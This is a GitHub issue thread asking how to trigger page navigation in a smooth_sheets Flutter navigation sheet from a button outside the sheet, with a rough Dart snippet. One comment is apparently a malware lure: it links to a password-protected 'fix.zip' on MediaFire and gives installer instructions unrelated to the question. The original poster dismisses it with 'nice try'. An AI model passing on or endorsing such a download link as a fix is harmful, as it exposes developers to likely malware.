### ISSUE TITLE
Can i navigate to other page with a button outside the navigation sheet?

### ISSUE THREAD

**Issue by andikatp** [fujidaiti/smooth_sheets#232]
Hi this is not an issue just a quick question, can i somehow navigate to the second page by a button which exist outside the navigation sheet? for example this code from your example/lib/tutorial/declarative_navigation_sheet.dart, i want that _ExampleSheet react to the button which outside the navigation sheet, thanks for the great package
```
class _ExampleHome extends StatelessWidget {
  const _ExampleHome({
    required this.nestedNavigator,
  });

  final Widget nestedNavigator;

  @override
  Widget build(BuildContext context) {
    return Stack(
      children: [
        const Scaffold(
body: ElevatedButton(onPressed: () => 'go to the second page', child: Text('button'))
),
        _ExampleSheet(nestedNavigator: nestedNavigator),
      ],
    );
  }
}
}
```

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andikatp** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

nice try
